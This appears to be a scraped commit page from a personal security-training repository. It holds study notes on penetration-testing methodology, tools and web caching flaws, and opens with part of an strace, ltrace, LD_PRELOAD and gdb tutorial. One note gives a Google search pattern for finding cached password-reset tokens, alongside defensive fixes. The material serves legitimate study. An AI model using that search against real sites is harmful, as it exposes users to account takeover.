WIDTH="100%"/></DIV
><DIV
CLASS="sect1"
><H1
CLASS="sect1"
><A
NAME="AEN79"/>4. Determining Program Behavior</H1
><P
>&#13; There are a couple of tools that allow us to look into program
behavior at a more closer level. Lets look at some of these:
</P
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN82"/>4.1. strace/truss(Solaris)</H2
><P
>&#13; These programs trace system calls a program makes as it makes them.
</P
><P
>Useful options:
<P
></P
><OL
TYPE="1"
><LI
><P
>-f (follow fork)</P
></LI
><LI
><P
>-ffo filename (output trace to filename.pid for
forking)</P
></LI
><LI
><P
>-i (Print instruction pointer for each system
call)</P
></LI
></OL
>
</P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN93"/>4.2. ltrace</H2
><P
>&#13; This utility is extremely useful. It traces ALL library calls made by a
program.
</P
><P
>Useful options:
<P
></P
><OL
TYPE="1"
><LI
><P
>-S (display syscalls too)</P
></LI
><LI
><P
>-f (follow fork)</P
></LI
><LI
><P
>-o filename (output trace to filename)</P
></LI
><LI
><P
>-C (demangle C++ function call names)</P
></LI
><LI
><P
>-n 2 (indent each nested call 2 spaces)</P
></LI
><LI
><P
>-i (prints instruction pointer of caller)</P
></LI
><LI
><P
>-p pid (attaches to specified pid)</P
></LI
></OL
>
</P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN112"/>4.3. LD_PRELOAD</H2
><P
>&#13; This is an environment variable that allows us to add a library to the
execution of a particular program. Any functions in this library
automatically override standard library functions. Sorry, you can't use
this with suid programs.
</P
><P
>Example:</P
><P
>% gcc -o preload.so -shared <A
HREF="code/preload.c"
TARGET="_top"
>preload.c</A
> -ldl</P
><P
>% LD_PRELOAD=preload.so ssh students.uiuc.edu</P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN119"/>4.4. gdb</H2
><P
>&#13; gdb is the GNU debugger. It is very intimidating to most people, but
there really is no reason for it to be. It is very well done for a
command line debugger. There is a nice GUI front end to it known as
<A
HREF="http://www.gnu.org/software/ddd/"
TARGET="_top"
>DDD</A
>,
but our purposes will require a closer relationship with the command
line.
</P
><P
>&#13; gdb has a nice built-in help system organized by topic. typing help will
show you the catagories. The main commands we will be interested in are
run, break, cont, stepi, finish, disassemble, bt, info [registers/frame], and x.
Every command in gdb can be followed by a number N, which means repeat N
times. For example, stepi 1000 will step over 1000 assembly instructions.
</P
><P
>&#13; -&gt; Example using gdb to set breakpoints in functions with and without
debugging symbols.
</P
></DIV
></DIV
><DIV
CLASS="NAVFOOTER"
><HR
ALIGN="LEFT"
WIDTH="100%"/><TABLE
SUMMARY="Footer navigation table"
WIDTH="100%"
BORDER="0"
CELLPADDING="0"
CELLSPACING="0"
><TR
><TD
WIDTH="33%"
ALIGN="left"
VALIGN="top"
><A
HREF="x47.htm"
ACCESSKEY="P"
>Prev</A
></TD
><TD
WIDTH="34%"
ALIGN="center"
VALIGN="top"
><A
HREF="t1.htm"
ACCESSKEY="H"
>Home</A
></TD
><TD
WIDTH="33%"
ALIGN="right"
VALIGN="top"
><A
HREF="x125.htm"
ACCESSKEY="N"
>Next</A
></TD
></TR
><TR
><TD
WIDTH="33%"
ALIGN="left"
VALIGN="top"
>Gathering Info</TD
><TD
WIDTH="34%"
ALIGN="center"
VALIGN="top"
>&nbsp;</TD
><TD
WIDTH="33%"
ALIGN="right"
VALIGN="top"
>Determining Interesting Functions</TD
></TR
></TABLE
></DIV
></BODY
></HTML
>

31
src/Security/Training/CompTIA-Sec+.txt Normal file
View File

@@ -0,0 +1,31 @@
Lesson 1: Comparing and Contrasting Attacks
Lesson 2: Comparing and Contrasting Security Controls
Lesson 3: Assessing Security Posture with Software Tools
Lesson 4: Explaining Basic Cryptography Concepts
Lesson 5: Implementing a Public Key Infrastructure
Lesson 6: Implementing Identity and Access Management Controls
Lesson 7: Managing Access Services and Accounts
Lesson 8: Implementing a Secure Network Architecture
Lesson 9: Installing and Configuring Security Appliances
Lesson 10: Installing and Configuring Wireless and Physical Access Security
Lesson 11: Deploying Secure Host, Mobile, and Embedded Systems
Lesson 12: Implementing Secure Network Access Protocols
Lesson 13: Implementing Secure Network Applications
Lesson 14: Explaining Risk Management and Disaster Recovery Concepts
Lesson 15: Summarizing Secure Application Development Concepts
Lesson 16: Explaining Organizational Security Concepts

146
src/Security/Training/Penttesting Learning Path.txt Normal file
View File

@@ -0,0 +1,146 @@
Note: This phase listing is based off of my programming background,
what I did with Juice Shop, and Fedlearn classes.
Note 2:
Free Time at Work phase covers stuff that doesn't fit nicely in the other phases.
Note 3: OWASP Juice Shop: 16% completed.
( Most of 1 stars, a quarter of 2 stars, one or two of the 3 stars, and one 5 or 6 stars )
Goals:
2-3 hours per weekend! (
1 hour per day of video then try and apply concepts.
Application happens either on the day of video or all on Sunday.
)
-- Certificates --
Security+
Training: https://store.comptia.org/p/SEC-005-CMLR-2019 ($499.00 at 12 months access)
Certificate: https://store.comptia.org/p/CompTIAS ($499.00 with 1x retake option)
CISSP
Training: https://www.isc2.org/Training/Online-Self-Paced ($2,795.00 at 120 day access)
Certificate: https://www.isc2.org/Certifications/CISSP (~$699.00)
:: Phase1: This phase is a broad rundown of things to look at when doing application hacking. ::
This is the big picture section of what can be drilled down into. Most of the lessons will be structured to
fill these knowledge sets. I get a few introduction classes discussing broad topics and then a play by play
to see the concepts in action.
I then start off proper by getting an introduction into reconnaissance and footprinting the app, network, etc.
From there, pretty much after reconnaissance, it comes down to a wide array of potential threat vectors.
I cover the fundamentals with the below topics while re-enforcing what I studied from Fedlearn.
/********************************** COMPLETED **********************************\
(08/16) Beginner 2h 22m by Keith Watson Penetration Testing: The Big Picture
(08/16) Intermediate 2h 38m by Mike Woolard Web Application Penetration Testing Fundamentals
(08/16) Beginner 1h 2m by Troy Hunt Play by Play: Ethical Hacking with Troy Hunt
(08/23) Intermediate 1h 21m by Will Vandeva External Footprinting: Reconnaissance and Mapping
(08/30) Beginner 1h 14m by Dawid Czagan Web App Hacking: Sensitive Data Exposure
(08/30) Beginner 1h 2m by Dawid Czagan Web App Hacking: Cookie Attacks
(08/30) Beginner 1h 0m by Dawid Czagan Web App Hacking: Hacking Authentication
(08/30) Beginner 49m by Dawid Czagan Web App Hacking: Hacking Password Reset Functionality
(09/06) Beginner 51m by Dawid Czagan Web App Hacking: Cross-Site Request Forgery (CSRF)
(09/06) Beginner 45m by Dawid Czagan Web App Hacking: Caching Problems
(09/06) Beginner 50m by Dawid Czagan Web App Hacking: Hacking XML Processing
/********************************** TO-DO **********************************\
... COMPLETED ALL IN THIS PHASE ...
:: Phase2: This phase is to really flesh out the intro phase of 1. ::
/********************************** COMPLETED **********************************\
/********************************** TO-DO **********************************\
(09/13, 20)
Beginner 7h 24m by Dale Meredith Performing and Analyzing Network Reconnaissance
(09/27) Beginner 3h 0m by Troy Hunt Ethical Hacking: Evading IDS, Firewalls, and Honeypots
(10/04) Beginner 2h 25m by Troy Hunt Ethical Hacking: Hacking Web Servers
(10/11) Beginner 3h 27m by Troy Hunt Ethical Hacking: Session Hijacking
(10/18) Beginner 2h 49m by Troy Hunt Ethical Hacking: Denial of Service
(10/25, 11/01)
Beginner 5h 25m by Troy Hunt Ethical Hacking: SQL Injection
(11/08, 15)
Beginner 4h 49m by Troy Hunt Ethical Hacking: Hacking Web Applications
(11/22, 29)
Beginner 4h 56m by Dale Meredith Ethical Hacking: Hacking Mobile Platforms
(12/06) Intermediate 1h 56m by Gus Khawaja Penetration Testing Automation Using Python and Kali Linux
(12/06) Intermediate 3h 32m by Liam Cleary Penetration Testing SharePoint
(12/13) Intermediate 1h 31m by Daniel Teixeira Penetration Testing in Action
(12/20, 27)
Intermediate 5h 12m by Jerod Brennen Performing OSINT Gathering on Corporate Targets
(01/03) Intermediate 3h 52m by Chad Russell Exploitation: Evading Detection and Bypassing Countermeasures
(01/10) Beginner 1h 23m by Gus Khawaja Network Penetration Testing Using Python and Kali Linux
(01/17) Intermediate 4h 7m by Troy Hunt Hack Your API First
(01/24, 31)
Intermediate 9h 25m by Troy Hunt Hack Yourself First: How to go on the Cyber-Offense
(02/07) Intermediate 1h 57m by Peter Mosm OPSEC for Penetration Testers
:: Phase3: More advanced stuff that looks to bring it all together. ::
/********************************** COMPLETED **********************************\
/********************************** TO-DO **********************************\
(02/14) Intermediate 2h 1m by Clark Voss Web Application Penetration Testing: Session Management Testing
(02/14) Intermediate 2h 14m by Sunny Wear Web Application Penetration Testing with Burp Suite
(02/21) Advanced 1h 15m by Sunny Wear Advanced Web Application Penetration Testing with Burp Suite
(02/28) Advanced 2h 48m by Sunny Wear Writing Burp Suite Macros and Plugins
(03/06, 13)
Advanced 6h 3m by Gus Khawaja Penetration Testing and Ethical Hacking with Kali Linux
:: Phase4: This is for the not so fun part of app pentesting- reports. ::
/********************************** COMPLETED **********************************\
/********************************** TO-DO **********************************\
Intermediate 2h 0m by Will Vandeva Writing Penetration Testing Reports
Beginner 4h 47m by Ben Sullins Data Analysis Fundamentals with Tableau
Intermediate 1h 36m by Ben Sullins Enterprise Business Intelligence with Tableau Server
Intermediate 3h 44m by Ben Sullins Big Data Analytics with Tableau
Intermediate 1h 47m by Robert Horvick Data Visualizations Using Tableau Public
:: Free Time at Work ::
/********************************** COMPLETED **********************************\
/********************************** TO-DO **********************************\
Beginner 1h 17m by Mark Minasi The Case for PowerShell
Beginner 6h 19m by Robert Cain Beginning PowerShell Scripting for Developers
Beginner 2h 41m by Robert Cain Introduction to PowerShell
Intermediate 2h 23m by Mike Thomas Pivot Tables for Excel 2016
Intermediate 3h 18m by Diane McSor Excel 2016 for Power Users
Intermediate 2h 27m by Troy Hunt AngularJS Security Fundamentals
Beginner 1h 38m by Troy Hunt Getting Started with Cloudflare Security

11
src/Security/Training/Phase1/000_Penetration Testing - The Big Picture/Course Overview.txt Normal file
View File

@@ -0,0 +1,11 @@
Penetration Testing:
-- Demonstrate weaknesses through simulated attacks
-- Determine an orgs. resistance to attacks
-- Report on security posture and provide recommendations
Overview:
-- Role of penetration testing in information security
-- Penetration tests
-- Penetration Testing Execution Standard (PTES)
-- Pen testers and their tools

BIN
src/Security/Training/Phase1/000_Penetration Testing - The Big Picture/materials/module-2-image-1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 182 KiB

BIN
src/Security/Training/Phase1/000_Penetration Testing - The Big Picture/materials/module-2-image-2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 112 KiB

BIN
src/Security/Training/Phase1/000_Penetration Testing - The Big Picture/materials/module-3-image-1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 262 KiB

BIN
src/Security/Training/Phase1/000_Penetration Testing - The Big Picture/materials/module-3-image-2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 118 KiB

BIN
src/Security/Training/Phase1/000_Penetration Testing - The Big Picture/materials/module-3-image-3.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 167 KiB

BIN
src/Security/Training/Phase1/000_Penetration Testing - The Big Picture/materials/module-4-image-1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 120 KiB

BIN
src/Security/Training/Phase1/000_Penetration Testing - The Big Picture/materials/module-4-image-2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 196 KiB

BIN
src/Security/Training/Phase1/000_Penetration Testing - The Big Picture/materials/module-4-image-3.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 104 KiB

BIN
src/Security/Training/Phase1/000_Penetration Testing - The Big Picture/materials/penetration-testing-big-picture.zip Normal file
View File

Binary file not shown.

124
src/Security/Training/Phase1/000_Penetration Testing - The Big Picture/module-1 - The role of Penetration Testing in Security Testing.txt Normal file
View File

@@ -0,0 +1,124 @@
Overview:
-- Information Security Management
-- Risk Management
-- Security Controls
-- Penetration Testing
:: Information Security Management ::
-- (Security Principles) --
[ CIA or Security Triad ]
Confidentiality --> Only authorized systems, processes, and individuals should have access when needed.
Note: Pretty straightforward but can affect integrity if not maintained...
Integrity --> Information should be protected from intentional, unauthorized, or accidental changes.
Note: Deleted information is bad; but, what if we lose trust in the validity of that
information? Integrity isn't just protection against loss but destructive edits, etc.
Availability --> That information should be available to authorized individuals when needed.
Note: Basically up time. Security is also assurance that one can have near 24/7
access for authed users.
This is very important for timely processes such as billing,
business competition, governmental actions militarily or otherwise.
[ Governance ]: Leadership and oversight
[ Guidance ]: Policies, plans, standards, guidelines, and procedures
...geared around...
[ Risk Management ]: (paraphrased) value/asset identification and risks against them.
...combined with...
[ Ethics ]: (paraphrased) promotion of moral guidelines against amoral actions/actors
Note: This is the- what is the red line concept? We can't ident. or protect
without knowing WHAT we need to prevent and detect against.
... which improves...
[ Org. Behavior ]: (paraphrased) improves training, awareness, and org. structure to comply with
business goals and laws.
:: Risk Management ::
(Penetration testing is just one tool of many to identify risks to the security of the org.)
[ Establish Risk Context ]: Environment in which decisions on risk are made. (Risk Management Strategy)
[ Assess Risks ]: (paraphrased) Who, what, when, where, why (This looks at the org.'s over
all posture and Risk Management
Strategy)
[ Respond to Risks ]: Evaluating, developing, and implementing response to reduce/limit risk.
[ Monitor Risks ]: (paraphrased) adapting to changes of threats or changes of value targets
to re-posture security and the aforementioned systems.
-- (Principles) --
[ Avoidance ]: (paraphrased) Don't do stupid shit that you know exposes oneself to threats.
IE, bad practices and policies
[ Transference ]: Sharing risk (often linked with insurance) is only part of the picture. *(legal responsibility is not transferred)
If using cloud, the responsibility is shared between you and the provider.
[ Mitigation ]: security controls, counter-measures, monitoring tools
[ Acceptance ]: willing to take the punch if loss occurs. Basically, not much of a defense or barely mitigateable.
Note: likelihood is low
:: Security Controls :: (Establish boundaries)
-- Control Mechanisms --
[ Detective ]: Discover when policies have been violated (Intrusion detection system, IDS)
[ Preventive ]: Inhibit actions that violate policies (firewalls)
[ Corrective ]: Use violations or exceptions to counteract the violation (configuration management)
[ Deterrent ]: Discourage aberrant actions/violations (User accounts)
[ Recovery ]: Flow control to normal state (system backups)
-- Control Types --
[ Administrative ]: define and manage access to information (background checks)
[ Technical ]: logical controls in systems that determine access to info n' services (patching systems and app)
[ Physical ]: mechanisms that protect access to physical spaces and devices. (cameras)
-- Testing Controls --
"Box" Testing
[ White Box ]: aka, Crystal box testing, has complete information about, and access to the system being tested.
(user accounts, admin access, documentation, source code, test suits and frameworks, test cases, algorithm descriptions, etc.)
[ Grey Box ]: some info is available but not complete
(source code but no user accounts or admin access. Api calls anyone??)
[ Black Box ]: no information or access. Purely blind except for what is publicly accessible.
(crafting inputs and observing responses)
:: Penetration Testing ::
Determine effectiveness of real world attacks.
Determine the level of skill required.
Ident. needed security controls.
Evaluate response to the attack.
-- Tools, Techniques, and Procedures --
Exploit known vulnerabilities.
Find new vulnerabilities
Use existing tools
Create new tools
Social engineering
-- Colloquialisms and Terms --
"Pen Test" == Penetration testing
"Pen" == Even shorter- "How is the pen going?"
"Red Team" == From military and intelligence groups meaning "The attackers"
"Blue Team" == The defenders
"Purple Team" == a combo of red n blue teams, in an exercise to test specific
controls and skill sets

142
src/Security/Training/Phase1/000_Penetration Testing - The Big Picture/module-2 - Penetration Tests.txt Normal file
View File

@@ -0,0 +1,142 @@
Overview:
-- Manual and Automated Testing
-- Goal-oriented and Time-limited Testing
-- Network Focused Testing
-- Application Focused Testing
-- Physical Testing
-- Social Engineering
:: Manual and Automated Testing ::
-- Manual --
Require understanding target
Create custom queries and inputs
Configure a tool specifically for the target
Create custom code
Interpret output and results
Consider the internal state and operations
[ Low error rate ]
-- Few False Positives
-- Few False Negatives
[ Level of effort ]
-- Exploration: High
-- Interpretation: High
[ Likelihood of detection ] == Low
-- Automated --
Requires a target
Can use default settings
Must review results
Adjust settings
Repeat tests
[ High error rate ]
-- More False Positives
-- More False Negatives
[ Level of effort ]
-- Exploration: Low
-- Interpretation: Medium
[ Likelihood of detection ] == High
:: Goal-oriented and Time-limited Testing ::
-- Goal-oriented -- ( Specific targets; Narrows focus )
Define goal in contract
Provide proof that goal was achieved
Get access on specific system
Place a fake device in an office
Exfil. a specific type of data
-- Time-limited --
Cost controlled by client.
Take a comprehensive buyt focused approach
Provide valuable actionable data
Highly targeted due to time frame
:: Network Focused Testing ::
Attain unauthorized access
Evaluate compromised system
Pivot to the next system
Repeat
-- Org. Network Types
[ Internal Network ]: Informational assets exist, stored, processed, managed, and processed.
(Physical and virtual network wiring)
[ Wireless Network ]: (wireless clients, access points, and management systems)
Can act as a perimeter network.
[ Perimeter Network ]: Provides access to a portion of a systems network (eail, web, DNS servers, and VPN)
Third party apps and services go here too.
:: Application Focused Testing ::
Commercial-off-the-shelf (COTS)
Internally developed
Third-party developed
Shadow IT (Unvetted applications that you're not aware of necessarily.
Printer drivers maybe? NIC drivers? Etc...)
Software-as-a-Service (SaaS)
[ Outdated Software ]
[ Misconfiguration ]
[ Poor design ]
[ Poor implementation ]
-- Application Types --
Enterprise Apps: org. wide systems such as enterprise resource planning or ERP apps,
HR systems, customer relationship management or CRM apps, or file
storage and archive systems
Web Sites, Apps, and Services
Mobile Apps: Sensitive data locally on a device. Easily lost or subject to search.
Thick Clients: Desktop applications that store data locally or access sensitive data remotely
:: Physical Testing ::
-- information Gathering --
[ Dumpster Diving ]
[ Surveillance ]
-- Observation
-- Photo and Video
[ Satellite Imagery ]
-- Ident. perimeters of facility, locations of physical plant and utilities, points of
surveillance and entry, and for measuring distances around the facility.
[ Open Sources ]
-- Client's websites, city, county, and court records, and filings with regulatory agencies.
:: Social Engineering :: ( Hacking the human mind )
-- Pretexting --

148
src/Security/Training/Phase1/000_Penetration Testing - The Big Picture/module-3 - PTES.txt Normal file
View File

@@ -0,0 +1,148 @@
Overview:
-- Use of the PTES
-- Pre-engagement Interactions
-- Intelligence Gathering
-- Threat Modeling
-- Vulnerability Analysis
-- Exploitation
-- Post Exploitation
-- Reporting
:: Use of the PTES ::
http://www.pentest-standard.org/index.php/Main_Page
:: Pre-engagement Interactions ::
[ Project scoping ]: Defining effort, size of tests, time of work, scope creep mitigation
[ Information Gathering ]: See module-3-image-1 in this dir. (Not exhaustive list)
[ Defining Goals ]: No dih side
[ Emergency Contacts ]: Systems could go down, vulnerability found, etc.
Get: Full name, Title and operational responsibility,
Authorization to discuss testing activities
Two 24/7 contact numbers
A method of secure information exchange
[ Rules of Engagement ]: HOW will things be tested? Time lines, locations, evidence handling,
status updates, testing times, permission to test documents, etc.
:: Intelligence Gathering ::
Target selection
Identification and Naming
OSINT - Open Source Intelligence: See module-3-image-2 for more info in a broad
setup / or look through documentation at the link above
Footprinting: DNS, DHCP, BGP, Whois databases, and even packet sniffing
:: Threat Modeling :: (Included in report to client...)
Business Asset Analysis
[ Business Process Analysis ]: Technical infrastructure
Information Assets
Human Assets
Third Party Integration
[ Threat Agents / Community Analysis ]: see module-3-image-3 image for quick rundown...
[ Threat Capability Analysis ]: Analyzing tools used buy threats, availability of tools and exploits,
comms mechanisms, accessibility
[ Motivation Modeling ]: Money, fame/fun, hacktivism, grudge, nation state threats?
:: Vulnerability Analysis ::
[ Active ]: Interaction with system (network scanners, app scanners,
protocol specific scanners, manual/direct scans)
[ Passive ]: Metadata analysis, traffic monitoring
[ Validation ]: Confirming results through correlation and manual testing. Attack trees and attack avenues
[ Research ]: Public knowledge/portals/vendors, exploit DBs, common passwords,
hardening guides for understanding weaknesses, disassembly and code analysis
:: Exploitation ::
( Leveraging what was found in the Vulnerability Analysis )
[ Countermeasures ]: Protection mechanisms --> Anti-virus software,
Humans (like being helpful), Data Execution Protection,
Address space layout randomization, Web Application Firewalls (WAFs)
[ Evasion ]: Avoiding detection
[ Precision Strike ]: Only use exploits most likely to achieve success
[ Customized Exploitation Avenue ]: Customizing exploits
[ Tailored Exploits ]: These require development work --> Basically, it might have worked
on one machine, model, or system but needs change to work on another
[ Zero-day Angle ]: Fuzzing / fault injection, source code analysis
(Buffer overflows, structured exception handling or SEH overwrites,
and return-oriented programming), Traffic analysis, etc
[ Example Avenues of Attack ]: This is on the website but attempts to explain various avenues of attack.
[ Overall Objective ]: How project objectives should be considered when creating exploit path/process
:: Post Exploitation ::
Rules of Engagement: Protects you and protects client
Infrastructure Analysis: Learning system for pivoting and concluding report
Pillaging: *Not what it sounds like: Alll about gathering system
info such as security, programs installed, configuratuions,
security, email, EVERYTHING!!
High Value / Profile Targets
Data Exfil.: How data can be removed? Finding this out...
Persistence: Backdoor persistence, credential sniffing, keyloggers, etc.
Pivoting: Further exploits to other systems
Cleanup: Remove everything done to system during attack. Config changes, programs, etc.
:: Reporting ::
Executive summery:
-- Background
-- Overall Posture
-- Risk Ranking / Profile of org.
-- General Findings
-- Recommendations Summary
-- Strategic Roadmap for mitigation
Technical Report:
-- Introduction: Outline key facts about the test and results
-- Information Gathering: Should describe intel gathered and how. (Active or Passive means?)
-- Vulnerability Assessment: Risk-ranked list of potential vulnerabilities discovered
-- Exploitation:
-- Post Exploitation: Describes activities that occurred once access was established
-- Risk: Describes and quantifies risks, vulnerabilities, exploitation, and post exploits
-- Conclusion: Highlight key finding

64
src/Security/Training/Phase1/000_Penetration Testing - The Big Picture/module-4 - Pen Testers and their Tools.txt Normal file
View File

@@ -0,0 +1,64 @@
Overview:
-- Penetration Testers
-- Penetration Testing Tools
-- Certifications
-- Pluralsight Courses
:: Penetration Testers ::
Curious
Likes to solve puzzles
Driven by achievement
Detail oriented
Security background: Info Sec
Technology education: Programmers
:: Penetration Testing Tools ::
OS: Kali Linux or maybe macOS
Vulnerability Scanning: Nmap (swiss-army-knife XD), Metsploit, Open VAS,
Skipfish (website assessment tool),
WPScan (wordpress scanning tool),
*Commercial: Rapi7 Nexpose, Qualys, Tenable Nessus
Vulnerability Exploitation: Metasploit, Rapid7's Metasploit, SQLmap (sql injection),
Social Engineering Toolkit, BeEF (browser exploitation framework for)
Password Cracking: John the Ripper, Hashcat, Ophcrack, rainbow Tables
Documentation tools: leafpad, KeepNote, Libreoffice, Desktop recording,
:: Certifications (For Pen Testers) ::
EC-Council:
-- CEH --> Certified Ethical Hacker
-- LPT --> Licensed Penetration Tester
Offensive Security:
-- OS Certified Professional (OSCP)
-- OS Wireless Professional (OSWP) [Wireless network penetration testing cert.]
-- OS Certified Expert (OSCE) [Higher level]
-- OS Exploitation Expert (OSEE) [Windows focused with practical exam creating exploit]
-- OS Web Expert (OSWE) [web app exploiting]
:: Pluralsight Courses ::
Ethical Hacking (CEH Prep) [From EC-Council]
Other:
-- Introductory Courses --
See module-4-image-1 image
-- Advanced Courses --
See module-4-image-2 image
-- Play by Plays --
See module-4-image-3 image

9
src/Security/Training/Phase1/1010_Web App Hacking: Caching Problems/Course Overview.txt Normal file
View File

@@ -0,0 +1,9 @@
Concepts:
...
Overview:
-- Google Caching
-- Cacheable HTTPS Responses
-- Caching of Credit Card Data
-- Sensitive Data in the URL
-- Industry Best Practices

BIN
src/Security/Training/Phase1/1010_Web App Hacking: Caching Problems/materials/caching-problems-web-app-hacking.zip Normal file
View File

Binary file not shown.

BIN
src/Security/Training/Phase1/1010_Web App Hacking: Caching Problems/materials/module-5-image-1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 392 KiB

44
src/Security/Training/Phase1/1010_Web App Hacking: Caching Problems/module-1 - Google Caching.txt Normal file
View File

@@ -0,0 +1,44 @@
Overview:
-- Google Indexing and Caching
-- How to Find Sensitive Data in Google
-- Demo
-- Fixing the Problem
:: Google Indexing and Caching ::
-- Tool(s) --
Google be god and library of secrets.
:: How to Find Sensitive Data in Google ::
-- Tool(s) --
See if a users password reset link has been cache...
See if token is still valid.
In google search try the following:
site:example.com
inurl: token <-- where token is a string to search for
:: Demo ::
-- Tool(s) --
Skipped...
:: Fixing the Problem ::
-- Tool(s) --
Don't store sensitive data in urls.
Add to sensitive pages:
<meta name="robots" content="noindex,nofollow">

40
src/Security/Training/Phase1/1010_Web App Hacking: Caching Problems/module-2 - Cacheable HTTPS Responses.txt Normal file
View File

@@ -0,0 +1,40 @@
Overview:
-- HTTPS Is Not Enough!
-- Demo
-- Fixing the Problem
:: HTTPS Is Not Enough! ::
-- Tool(s) --
If https responses are cacheable.
What if password reset is cached and header has the info?
Security is bypassed....
:: Demo ::
-- Tool(s) --
about:cache <-- firefox
HTTPS: secure communication channel
Sensitive data returned in HTTPS response (e.g. password)
+
Cacheable HTTPS response (e.g. Cache-control/Pragma headers not implemented)
=
Password cached in plaintext
:: Fixing the Problem ::
-- Tool(s) --
Don't return sensative data in HTTPS responses.
Set proper caching headers like cache control and pragma...
Cache-control: no-store
Pragma: no-cache

24
src/Security/Training/Phase1/1010_Web App Hacking: Caching Problems/module-3 - Caching of Credit Card Data.txt Normal file
View File

@@ -0,0 +1,24 @@
Overview:
-- Caching of Data Entered by the User
-- Demo
-- Fixing the Problem
:: Caching of Data Entered by the User :: && :: Demo ::
-- Tool(s) --
Sensitive data entered by user.
autocomplete="off" not used in form fields...
Stores credit card info in plain text from cache.
*** What's really bad is that companies are more
and more geared to check the validity of the card
:: Fixing the Problem ::
-- Tool(s) --
autocomplete="off" for every input field that takes sensitive data

30
src/Security/Training/Phase1/1010_Web App Hacking: Caching Problems/module-4 - Sensitive Data in the URL.txt Normal file
View File

@@ -0,0 +1,30 @@
Overview:
-- URL and Sensitive Data
-- Demo
-- Fixing the Problem
:: URL and Sensitive Data ::
-- Tool(s) --
GET post?? Yup...
Don't.
:: Demo ::
-- Tool(s) --
Shows server logs containing the password.
:: Fixing the Problem ::
-- Tool(s) --
Use POST for sensitive data transfer including things
like no-cache in cache-control and pragma plus autocomplete="off"
in form fields.

19
src/Security/Training/Phase1/1010_Web App Hacking: Caching Problems/module-5 - Industry Best Practices.txt Normal file
View File

@@ -0,0 +1,19 @@
Overview:
-- OWASP ASVS
-- V9: Data Protection Verification Requirements
:: OWASP ASVS ::
-- Tool(s) --
Look at the OWASP ASVS data protection module...
:: V9: Data Protection Verification Requirements ::
-- Tool(s) --
See module-5-image-1 mage

9
src/Security/Training/Phase1/111_Web Application Penetration Testing Fundamentals/Course Overview.txt Normal file
View File

@@ -0,0 +1,9 @@
Overview:
-- The Principles of a Web Application Penetration Test
-- Pre-engagement
-- Footprinting
-- Attacking User Controls
-- Attacking Application Inputs
-- Common Attack Methods
-- Discovering Logic Flaws
-- Reporting

BIN
src/Security/Training/Phase1/111_Web Application Penetration Testing Fundamentals/materials/module-1-image-1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 150 KiB

BIN
src/Security/Training/Phase1/111_Web Application Penetration Testing Fundamentals/materials/module-1-image-2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 266 KiB

BIN
src/Security/Training/Phase1/111_Web Application Penetration Testing Fundamentals/materials/module-3-image-1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 333 KiB

BIN
src/Security/Training/Phase1/111_Web Application Penetration Testing Fundamentals/materials/module-3-image-2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 81 KiB

Some files were not shown because too many files have changed in this diff Show More